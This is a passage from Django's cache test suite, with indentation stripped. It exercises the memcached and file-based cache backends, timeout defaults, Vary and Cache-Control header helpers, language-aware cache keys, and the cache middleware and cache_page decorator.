'PyLibMCCache.'
)
with self.assertRaisesMessage(RemovedInDjango41Warning, msg):
MemcachedCache('127.0.0.1:11211', {})
finally:
warnings.filterwarnings(
'ignore',
'MemcachedCache is deprecated',
category=RemovedInDjango41Warning,
)
@unittest.skipUnless(PyLibMCCache_params, "PyLibMCCache backend not configured")
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
))
class PyLibMCCacheTests(BaseMemcachedTests, TestCase):
base_params = PyLibMCCache_params
# libmemcached manages its own connections.
should_disconnect_on_close = False
@property
def incr_decr_type_error(self):
return cache._lib.ClientError
@override_settings(CACHES=caches_setting_for_tests(
base=PyLibMCCache_params,
exclude=memcached_excluded_caches,
OPTIONS={
'binary': True,
'behaviors': {'tcp_nodelay': True},
},
))
def test_pylibmc_options(self):
self.assertTrue(cache._cache.binary)
self.assertEqual(cache._cache.behaviors['tcp_nodelay'], int(True))
def test_pylibmc_client_servers(self):
backend = self.base_params['BACKEND']
tests = [
('unix:/run/memcached/socket', '/run/memcached/socket'),
('/run/memcached/socket', '/run/memcached/socket'),
('localhost', 'localhost'),
('localhost:11211', 'localhost:11211'),
('[::1]', '[::1]'),
('[::1]:11211', '[::1]:11211'),
('127.0.0.1', '127.0.0.1'),
('127.0.0.1:11211', '127.0.0.1:11211'),
]
for location, expected in tests:
settings = {'default': {'BACKEND': backend, 'LOCATION': location}}
with self.subTest(location), self.settings(CACHES=settings):
self.assertEqual(cache.client_servers, [expected])
@unittest.skipUnless(PyMemcacheCache_params, 'PyMemcacheCache backend not configured')
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
))
class PyMemcacheCacheTests(BaseMemcachedTests, TestCase):
base_params = PyMemcacheCache_params
@property
def incr_decr_type_error(self):
return cache._lib.exceptions.MemcacheClientError
def test_pymemcache_highest_pickle_version(self):
self.assertEqual(
cache._cache.default_kwargs['serde']._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
for cache_key in settings.CACHES:
for client_key, client in caches[cache_key]._cache.clients.items():
with self.subTest(cache_key=cache_key, server=client_key):
self.assertEqual(
client.serde._serialize_func.keywords['pickle_version'],
pickle.HIGHEST_PROTOCOL,
)
@override_settings(CACHES=caches_setting_for_tests(
base=PyMemcacheCache_params,
exclude=memcached_excluded_caches,
OPTIONS={'no_delay': True},
))
def test_pymemcache_options(self):
self.assertIs(cache._cache.default_kwargs['no_delay'], True)
@override_settings(CACHES=caches_setting_for_tests(
BACKEND='django.core.cache.backends.filebased.FileBasedCache',
))
class FileBasedCacheTests(BaseCacheTests, TestCase):
"""
Specific test cases for the file-based cache.
"""
def setUp(self):
super().setUp()
self.dirname = self.mkdtemp()
# Caches location cannot be modified through override_settings / modify_settings,
# hence settings are manipulated directly here and the setting_changed signal
# is triggered manually.
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = self.dirname
setting_changed.send(self.__class__, setting='CACHES', enter=False)
def tearDown(self):
super().tearDown()
# Call parent first, as cache.clear() may recreate cache base directory
shutil.rmtree(self.dirname)
def mkdtemp(self):
return tempfile.mkdtemp()
def test_ignores_non_cache_files(self):
fname = os.path.join(self.dirname, 'not-a-cache-file')
with open(fname, 'w'):
os.utime(fname, None)
cache.clear()
self.assertTrue(os.path.exists(fname),
'Expected cache.clear to ignore non cache files')
os.remove(fname)
def test_clear_does_not_remove_cache_dir(self):
cache.clear()
self.assertTrue(os.path.exists(self.dirname),
'Expected cache.clear to keep the cache dir')
def test_creates_cache_dir_if_nonexistent(self):
os.rmdir(self.dirname)
cache.set('foo', 'bar')
self.assertTrue(os.path.exists(self.dirname))
def test_get_ignores_enoent(self):
cache.set('foo', 'bar')
os.unlink(cache._key_to_file('foo'))
# Returns the default instead of erroring.
self.assertEqual(cache.get('foo', 'baz'), 'baz')
@skipIf(
sys.platform == 'win32',
'Windows only partially supports umasks and chmod.',
)
def test_cache_dir_permissions(self):
os.rmdir(self.dirname)
dir_path = Path(self.dirname) / 'nested' / 'filebasedcache'
for cache_params in settings.CACHES.values():
cache_params['LOCATION'] = dir_path
setting_changed.send(self.__class__, setting='CACHES', enter=False)
cache.set('foo', 'bar')
self.assertIs(dir_path.exists(), True)
tests = [
dir_path,
dir_path.parent,
dir_path.parent.parent,
]
for directory in tests:
with self.subTest(directory=directory):
dir_mode = directory.stat().st_mode & 0o777
self.assertEqual(dir_mode, 0o700)
def test_get_does_not_ignore_non_filenotfound_exceptions(self):
with mock.patch('builtins.open', side_effect=OSError):
with self.assertRaises(OSError):
cache.get('foo')
def test_empty_cache_file_considered_expired(self):
cache_file = cache._key_to_file('foo')
with open(cache_file, 'wb') as fh:
fh.write(b'')
with open(cache_file, 'rb') as fh:
self.assertIs(cache._is_expired(fh), True)
class FileBasedCachePathLibTests(FileBasedCacheTests):
def mkdtemp(self):
tmp_dir = super().mkdtemp()
return Path(tmp_dir)
@override_settings(CACHES={
'default': {
'BACKEND': 'cache.liberal_backend.CacheClass',
},
})
class CustomCacheKeyValidationTests(SimpleTestCase):
"""
Tests for the ability to mixin a custom ``validate_key`` method to
a custom cache backend that otherwise inherits from a builtin
backend, and override the default key validation. Refs #6447.
"""
def test_custom_key_validation(self):
# this key is both longer than 250 characters, and has spaces
key = 'some key with spaces' * 15
val = 'a value'
cache.set(key, val)
self.assertEqual(cache.get(key), val)
@override_settings(
CACHES={
'default': {
'BACKEND': 'cache.closeable_cache.CacheClass',
}
}
)
class CacheClosingTests(SimpleTestCase):
def test_close(self):
self.assertFalse(cache.closed)
signals.request_finished.send(self.__class__)
self.assertTrue(cache.closed)
def test_close_only_initialized(self):
with self.settings(CACHES={
'cache_1': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
'cache_2': {
'BACKEND': 'cache.closeable_cache.CacheClass',
},
}):
self.assertEqual(caches.all(initialized_only=True), [])
signals.request_finished.send(self.__class__)
self.assertEqual(caches.all(initialized_only=True), [])
DEFAULT_MEMORY_CACHES_SETTINGS = {
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'unique-snowflake',
}
}
NEVER_EXPIRING_CACHES_SETTINGS = copy.deepcopy(DEFAULT_MEMORY_CACHES_SETTINGS)
NEVER_EXPIRING_CACHES_SETTINGS['default']['TIMEOUT'] = None
class DefaultNonExpiringCacheKeyTests(SimpleTestCase):
"""
Settings having Cache arguments with a TIMEOUT=None create Caches that will
set non-expiring keys.
"""
def setUp(self):
# The 5 minute (300 seconds) default expiration time for keys is
# defined in the implementation of the initializer method of the
# BaseCache type.
self.DEFAULT_TIMEOUT = caches[DEFAULT_CACHE_ALIAS].default_timeout
def tearDown(self):
del(self.DEFAULT_TIMEOUT)
def test_default_expiration_time_for_keys_is_5_minutes(self):
"""The default expiration time of a cache key is 5 minutes.
This value is defined in
django.core.cache.backends.base.BaseCache.__init__().
"""
self.assertEqual(300, self.DEFAULT_TIMEOUT)
def test_caches_with_unset_timeout_has_correct_default_timeout(self):
"""Caches that have the TIMEOUT parameter undefined in the default
settings will use the default 5 minute timeout.
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertEqual(self.DEFAULT_TIMEOUT, cache.default_timeout)
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_has_correct_default_timeout(self):
"""Memory caches that have the TIMEOUT parameter set to `None` in the
        default settings will have `None` as the default timeout.
This means "no timeout".
"""
cache = caches[DEFAULT_CACHE_ALIAS]
self.assertIsNone(cache.default_timeout)
self.assertIsNone(cache.get_backend_timeout())
@override_settings(CACHES=DEFAULT_MEMORY_CACHES_SETTINGS)
def test_caches_with_unset_timeout_set_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter unset will set cache
keys having the default 5 minute timeout.
"""
key = "my-key"
value = "my-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNotNone(cache._expire_info[cache_key])
@override_settings(CACHES=NEVER_EXPIRING_CACHES_SETTINGS)
def test_caches_set_with_timeout_as_none_set_non_expiring_key(self):
"""Memory caches that have the TIMEOUT parameter set to `None` will set
a non expiring key by default.
"""
key = "another-key"
value = "another-value"
cache = caches[DEFAULT_CACHE_ALIAS]
cache.set(key, value)
cache_key = cache.make_key(key)
self.assertIsNone(cache._expire_info[cache_key])
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
ALLOWED_HOSTS=['.example.com'],
)
class CacheUtils(SimpleTestCase):
"""TestCase for django.utils.cache functions."""
host = 'www.example.com'
path = '/cache/test/'
factory = RequestFactory(HTTP_HOST=host)
def tearDown(self):
cache.clear()
def _get_request_cache(self, method='GET', query_string=None, update_cache=None):
request = self._get_request(self.host, self.path,
method, query_string=query_string)
request._cache_update_cache = update_cache if update_cache else True
return request
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('*', ('Accept-Language', 'Cookie'), '*'),
('Accept-Language, Cookie', ('*',), '*'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
response = HttpResponse()
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
request = self.factory.get(self.path)
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
# A specified key_prefix is taken into account.
key_prefix = 'localprefix'
learn_cache_key(request, response, key_prefix=key_prefix)
self.assertEqual(
get_cache_key(request, key_prefix=key_prefix),
'views.decorators.cache.cache_page.localprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_get_cache_key_with_query(self):
request = self.factory.get(self.path, {'test': 1})
response = HttpResponse()
# Expect None if no headers have been set yet.
self.assertIsNone(get_cache_key(request))
# Set headers to an empty list.
learn_cache_key(request, response)
# The querystring is taken into account.
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'beaf87a9a99ee81c673ea2d67ccbec2a.d41d8cd98f00b204e9800998ecf8427e'
)
def test_cache_key_varies_by_url(self):
"""
get_cache_key keys differ by fully-qualified URL instead of path
"""
request1 = self.factory.get(self.path, HTTP_HOST='sub-1.example.com')
learn_cache_key(request1, HttpResponse())
request2 = self.factory.get(self.path, HTTP_HOST='sub-2.example.com')
learn_cache_key(request2, HttpResponse())
self.assertNotEqual(get_cache_key(request1), get_cache_key(request2))
def test_learn_cache_key(self):
request = self.factory.head(self.path)
response = HttpResponse()
response.headers['Vary'] = 'Pony'
# Make sure that the Vary header is added to the key hash
learn_cache_key(request, response)
self.assertEqual(
get_cache_key(request),
'views.decorators.cache.cache_page.settingsprefix.GET.'
'18a03f9c9649f7d684af5db3524f5c99.d41d8cd98f00b204e9800998ecf8427e'
)
def test_patch_cache_control(self):
tests = (
# Initial Cache-Control, kwargs to patch_cache_control, expected Cache-Control parts
(None, {'private': True}, {'private'}),
('', {'private': True}, {'private'}),
# no-cache.
('', {'no_cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('', {'no-cache': 'Set-Cookie'}, {'no-cache=Set-Cookie'}),
('no-cache=Set-Cookie', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie,no-cache=Link', {'no_cache': True}, {'no-cache'}),
('no-cache=Set-Cookie', {'no_cache': 'Link'}, {'no-cache=Set-Cookie', 'no-cache=Link'}),
(
'no-cache=Set-Cookie,no-cache=Link',
{'no_cache': 'Custom'},
{'no-cache=Set-Cookie', 'no-cache=Link', 'no-cache=Custom'},
),
# Test whether private/public attributes are mutually exclusive
('private', {'private': True}, {'private'}),
('private', {'public': True}, {'public'}),
('public', {'public': True}, {'public'}),
('public', {'private': True}, {'private'}),
('must-revalidate,max-age=60,private', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
('must-revalidate,max-age=60,public', {'private': True}, {'must-revalidate', 'max-age=60', 'private'}),
('must-revalidate,max-age=60', {'public': True}, {'must-revalidate', 'max-age=60', 'public'}),
)
cc_delim_re = re.compile(r'\s*,\s*')
for initial_cc, newheaders, expected_cc in tests:
with self.subTest(initial_cc=initial_cc, newheaders=newheaders):
response = HttpResponse()
if initial_cc is not None:
response.headers['Cache-Control'] = initial_cc
patch_cache_control(response, **newheaders)
parts = set(cc_delim_re.split(response.headers['Cache-Control']))
self.assertEqual(parts, expected_cc)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix',
},
},
)
class PrefixedCacheUtils(CacheUtils):
pass
@override_settings(
CACHE_MIDDLEWARE_SECONDS=60,
CACHE_MIDDLEWARE_KEY_PREFIX='test',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
)
class CacheHEADTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def _set_cache(self, request, msg):
return UpdateCacheMiddleware(lambda req: HttpResponse(msg))(request)
def test_head_caches_correctly(self):
test_content = 'test content'
request = self.factory.head(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
def test_head_with_cached_get(self):
test_content = 'test content'
request = self.factory.get(self.path)
request._cache_update_cache = True
self._set_cache(request, test_content)
request = self.factory.head(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNotNone(get_cache_data)
self.assertEqual(test_content.encode(), get_cache_data.content)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
LANGUAGES=[
('en', 'English'),
('es', 'Spanish'),
],
)
class CacheI18nTest(SimpleTestCase):
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation(self):
request = self.factory.get(self.path)
lang = translation.get_language()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
def check_accept_language_vary(self, accept_language, vary, reference_key):
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_LANGUAGE'] = accept_language
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = vary
key = learn_cache_key(request, response)
key2 = get_cache_key(request)
self.assertEqual(key, reference_key)
self.assertEqual(key2, reference_key)
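    # The helper above asserts that learn_cache_key()/get_cache_key() produce
    # the same key regardless of how the Accept-Language header is spelled and
    # of the ordering of the values in the Vary header.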
@override_settings(USE_I18N=True, USE_TZ=False)
def test_cache_key_i18n_translation_accept_language(self):
lang = translation.get_language()
self.assertEqual(lang, 'en')
request = self.factory.get(self.path)
request.META['HTTP_ACCEPT_ENCODING'] = 'gzip;q=1.0, identity; q=0.5, *;q=0'
response = HttpResponse()
response.headers['Vary'] = 'accept-encoding'
key = learn_cache_key(request, response)
self.assertIn(lang, key, "Cache keys should include the language name when translation is active")
self.check_accept_language_vary(
'en-us',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'en-US',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8',
'accept-encoding, accept-language, cookie',
key
)
self.check_accept_language_vary(
'en-US,en;q=0.8,ko;q=0.6',
'accept-language, cookie, accept-encoding',
key
)
self.check_accept_language_vary(
'ko-kr,ko;q=0.8,en-us;q=0.5,en;q=0.3 ',
'accept-encoding, cookie, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR,ko;q=0.8,en-US;q=0.6,en;q=0.4',
'accept-language, accept-encoding, cookie',
key
)
self.check_accept_language_vary(
'ko;q=1.0,en;q=0.5',
'cookie, accept-language, accept-encoding',
key
)
self.check_accept_language_vary(
'ko, en',
'cookie, accept-encoding, accept-language',
key
)
self.check_accept_language_vary(
'ko-KR, en-US',
'accept-encoding, accept-language, cookie',
key
)
@override_settings(USE_I18N=False, USE_TZ=True)
def test_cache_key_i18n_timezone(self):
request = self.factory.get(self.path)
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertIn(tz, key, "Cache keys should include the time zone name when time zones are active")
key2 = get_cache_key(request)
self.assertEqual(key, key2)
@override_settings(USE_I18N=False)
def test_cache_key_no_i18n(self):
request = self.factory.get(self.path)
lang = translation.get_language()
tz = timezone.get_current_timezone_name()
response = HttpResponse()
key = learn_cache_key(request, response)
self.assertNotIn(lang, key, "Cache keys shouldn't include the language name when i18n isn't active")
self.assertNotIn(tz, key, "Cache keys shouldn't include the time zone name when i18n isn't active")
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
USE_I18N=True,
)
def test_middleware(self):
def set_cache(request, lang, msg):
def get_response(req):
return HttpResponse(msg)
translation.activate(lang)
return UpdateCacheMiddleware(get_response)(request)
# cache with non empty request.GET
request = self.factory.get(self.path, {'foo': 'bar', 'other': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# first access, cache must return None
self.assertIsNone(get_cache_data)
content = 'Check for cache with QUERY_STRING'
def get_response(req):
return HttpResponse(content)
UpdateCacheMiddleware(get_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# cache must return content
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, content.encode())
# different QUERY_STRING, cache must be empty
request = self.factory.get(self.path, {'foo': 'bar', 'somethingelse': 'true'})
request._cache_update_cache = True
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
# i18n tests
en_message = "Hello world!"
es_message = "Hola mundo!"
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'en', en_message)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
# The cache can be recovered
self.assertIsNotNone(get_cache_data)
self.assertEqual(get_cache_data.content, en_message.encode())
# change the session language and set content
request = self.factory.get(self.path)
request._cache_update_cache = True
set_cache(request, 'es', es_message)
# change again the language
translation.activate('en')
# retrieve the content from cache
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, en_message.encode())
# change again the language
translation.activate('es')
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertEqual(get_cache_data.content, es_message.encode())
# reset the language
translation.deactivate()
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX="test",
CACHE_MIDDLEWARE_SECONDS=60,
)
def test_middleware_doesnt_cache_streaming_response(self):
request = self.factory.get(self.path)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
def get_stream_response(req):
return StreamingHttpResponse(['Check for cache with streaming content.'])
UpdateCacheMiddleware(get_stream_response)(request)
get_cache_data = FetchFromCacheMiddleware(empty_response).process_request(request)
self.assertIsNone(get_cache_data)
@override_settings(
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'KEY_PREFIX': 'cacheprefix'
},
},
)
class PrefixedCacheI18nTest(CacheI18nTest):
pass
def hello_world_view(request, value):
return HttpResponse('Hello World %s' % value)
def csrf_view(request):
return HttpResponse(csrf(request)['csrf_token'])
@override_settings(
CACHE_MIDDLEWARE_ALIAS='other',
CACHE_MIDDLEWARE_KEY_PREFIX='middlewareprefix',
CACHE_MIDDLEWARE_SECONDS=30,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
'other': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
'LOCATION': 'other',
'TIMEOUT': '1',
},
},
)
class CacheMiddlewareTest(SimpleTestCase):
factory = RequestFactory()
def setUp(self):
self.default_cache = caches['default']
self.other_cache = caches['other']
def tearDown(self):
self.default_cache.clear()
self.other_cache.clear()
super().tearDown()
def test_constructor(self):
"""
Ensure the constructor is correctly distinguishing between usage of CacheMiddleware as
Middleware vs. usage of CacheMiddleware as view decorator and setting attributes
appropriately.
"""
# If only one argument is passed in construction, it's being used as
# middleware.
middleware = CacheMiddleware(empty_response)
# Now test object attributes against values defined in setUp above
self.assertEqual(middleware.cache_timeout, 30)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
# If more arguments are being passed in construction, it's being used
# as a decorator. First, test with "defaults":
as_view_decorator = CacheMiddleware(empty_response, cache_alias=None, key_prefix=None)
self.assertEqual(as_view_decorator.cache_timeout, 30) # Timeout value for 'default' cache, i.e. 30
self.assertEqual(as_view_decorator.key_prefix, '')
# Value of DEFAULT_CACHE_ALIAS from django.core.cache
self.assertEqual(as_view_decorator.cache_alias, 'default')
self.assertEqual(as_view_decorator.cache, self.default_cache)
# Next, test with custom values:
as_view_decorator_with_custom = CacheMiddleware(
hello_world_view, cache_timeout=60, cache_alias='other', key_prefix='foo'
)
self.assertEqual(as_view_decorator_with_custom.cache_timeout, 60)
self.assertEqual(as_view_decorator_with_custom.key_prefix, 'foo')
self.assertEqual(as_view_decorator_with_custom.cache_alias, 'other')
self.assertEqual(as_view_decorator_with_custom.cache, self.other_cache)
def test_update_cache_middleware_constructor(self):
middleware = UpdateCacheMiddleware(empty_response)
self.assertEqual(middleware.cache_timeout, 30)
self.assertIsNone(middleware.page_timeout)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_fetch_cache_middleware_constructor(self):
middleware = FetchFromCacheMiddleware(empty_response)
self.assertEqual(middleware.key_prefix, 'middlewareprefix')
self.assertEqual(middleware.cache_alias, 'other')
self.assertEqual(middleware.cache, self.other_cache)
def test_middleware(self):
middleware = CacheMiddleware(hello_world_view)
prefix_middleware = CacheMiddleware(hello_world_view, key_prefix='prefix1')
timeout_middleware = CacheMiddleware(hello_world_view, cache_timeout=1)
request = self.factory.get('/view/')
# Put the request through the request middleware
result = middleware.process_request(request)
self.assertIsNone(result)
response = hello_world_view(request, '1')
# Now put the response through the response middleware
response = middleware.process_response(request, response)
# Repeating the request should result in a cache hit
result = middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
# The same request through a different middleware won't hit
result = prefix_middleware.process_request(request)
self.assertIsNone(result)
# The same request with a timeout _will_ hit
result = timeout_middleware.process_request(request)
self.assertIsNotNone(result)
self.assertEqual(result.content, b'Hello World 1')
def test_view_decorator(self):
# decorate the same view with different cache decorators
default_view = cache_page(3)(hello_world_view)
default_with_prefix_view = cache_page(3, key_prefix='prefix1')(hello_world_view)
explicit_default_view = cache_page(3, cache='default')(hello_world_view)
explicit_default_with_prefix_view = cache_page(3, cache='default', key_prefix='prefix1')(hello_world_view)
other_view = cache_page(1, cache='other')(hello_world_view)
other_with_prefix_view = cache_page(1, cache='other', key_prefix='prefix2')(hello_world_view)
request = self.factory.get('/view/')
# Request the view once
response = default_view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
# Request again -- hit the cache
response = default_view(request, '2')
self.assertEqual(response.content, b'Hello World 1')
# Requesting the same view with the explicit cache should yield the same result
response = explicit_default_view(request, '3')
self.assertEqual(response.content, b'Hello World 1')
# Requesting with a prefix will hit a different cache key
response = explicit_default_with_prefix_view(request, '4')
self.assertEqual(response.content, b'Hello World 4')
# Hitting the same view again gives a cache hit
response = explicit_default_with_prefix_view(request, '5')
self.assertEqual(response.content, b'Hello World 4')
# And going back to the implicit cache will hit the same cache
response = default_with_prefix_view(request, '6')
self.assertEqual(response.content, b'Hello World 4')
# Requesting from an alternate cache won't hit cache
response = other_view(request, '7')
self.assertEqual(response.content, b'Hello World 7')
# But a repeated hit will hit cache
response = other_view(request, '8')
self.assertEqual(response.content, b'Hello World 7')
# And prefixing the alternate cache yields yet another cache entry
response = other_with_prefix_view(request, '9')
self.assertEqual(response.content, b'Hello World 9')
# But if we wait a couple of seconds...
time.sleep(2)
# ... the default cache will still hit
caches['default']
response = default_view(request, '11')
self.assertEqual(response.content, b'Hello World 1')
# ... the default cache with a prefix will still hit
response = default_with_prefix_view(request, '12')
self.assertEqual(response.content, b'Hello World 4')
# ... the explicit default cache will still hit
response = explicit_default_view(request, '13')
self.assertEqual(response.content, b'Hello World 1')
# ... the explicit default cache with a prefix will still hit
response = explicit_default_with_prefix_view(request, '14')
self.assertEqual(response.content, b'Hello World 4')
# .. but a rapidly expiring cache won't hit
response = other_view(request, '15')
self.assertEqual(response.content, b'Hello World 15')
# .. even if it has a prefix
response = other_with_prefix_view(request, '16')
self.assertEqual(response.content, b'Hello World 16')
def test_cache_page_timeout(self):
# Page timeout takes precedence over the "max-age" section of the
# "Cache-Control".
tests = [
(1, 3), # max_age < page_timeout.
(3, 1), # max_age > page_timeout.
]
for max_age, page_timeout in tests:
with self.subTest(max_age=max_age, page_timeout=page_timeout):
view = cache_page(timeout=page_timeout)(
cache_control(max_age=max_age)(hello_world_view)
)
request = self.factory.get('/view/')
response = view(request, '1')
self.assertEqual(response.content, b'Hello World 1')
time.sleep(1)
response = view(request, '2')
self.assertEqual(
response.content,
b'Hello World 1' if page_timeout > max_age else b'Hello World 2',
)
cache.clear()
def test_cached_control_private_not_cached(self):
"""Responses with 'Cache-Control: private' are not cached."""
view_with_private_cache = cache_page(3)(cache_control(private=True)(hello_world_view))
request = self.factory.get('/view/')
response = view_with_private_cache(request, '1')
self.assertEqual(response.content, b'Hello World 1')
response = view_with_private_cache(request, '2')
self.assertEqual(response.content, b'Hello World 2')
def test_sensitive_cookie_not_cached(self):
"""
Django must prevent caching of responses that set a user-specific (and
maybe security sensitive) cookie in response to a cookie-less request.
"""
request = self.factory.get('/view/')
csrf_middleware = CsrfViewMiddleware(csrf_view)
csrf_middleware.process_view(request, csrf_view, (), {})
cache_middleware = CacheMiddleware(csrf_middleware)
self.assertIsNone(cache_middleware.process_request(request))
cache_middleware(request)
# Inserting a CSRF cookie in a cookie-less request prevented caching.
self.assertIsNone(cache_middleware.process_request(request))
def test_304_response_has_http_caching_headers_but_not_cached(self):
original_view = mock.Mock(return_value=HttpResponseNotModified())
view = cache_page(2)(original_view)
request = self.factory.get('/view/')
# The view shouldn't be cached on the second call.
view(request).close()
response = view(request)
response.close()
self.assertEqual(original_view.call_count, 2)
self.assertIsInstance(response, HttpResponseNotModified)
self.assertIn('Cache-Control', response)
self.assertIn('Expires', response)
@override_settings(
CACHE_MIDDLEWARE_KEY_PREFIX='settingsprefix',
CACHE_MIDDLEWARE_SECONDS=1,
CACHES={
'default': {
'BACKEND': 'django.core.cache.backends.locmem.LocMemCache',
},
},
USE_I18N=False,
)
class TestWithTemplateResponse(SimpleTestCase):
"""
Tests various headers w/ TemplateResponse.
Most are probably redundant since they manipulate the same object
anyway but the ETag header is 'special' because it relies on the
content being complete (which is not necessarily always the case
with a TemplateResponse)
"""
path = '/cache/test/'
factory = RequestFactory()
def tearDown(self):
cache.clear()
def test_patch_vary_headers(self):
headers = (
# Initial vary, new headers, resulting vary.
(None, ('Accept-Encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('accept-encoding',), 'Accept-Encoding'),
('Accept-Encoding', ('ACCEPT-ENCODING',), 'Accept-Encoding'),
('Cookie', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding',), 'Cookie, Accept-Encoding'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
(None, ('Accept-Encoding', 'COOKIE'), 'Accept-Encoding, COOKIE'),
('Cookie, Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
('Cookie , Accept-Encoding', ('Accept-Encoding', 'cookie'), 'Cookie, Accept-Encoding'),
)
for initial_vary, newheaders, resulting_vary in headers:
with self.subTest(initial_vary=initial_vary, newheaders=newheaders):
template = engines['django'].from_string("This is a test")
response = TemplateResponse(HttpRequest(), template)
if initial_vary is not None:
response.headers['Vary'] = initial_vary
patch_vary_headers(response, newheaders)
self.assertEqual(response.headers['Vary'], resulting_vary)
def test_get_cache_key(self):
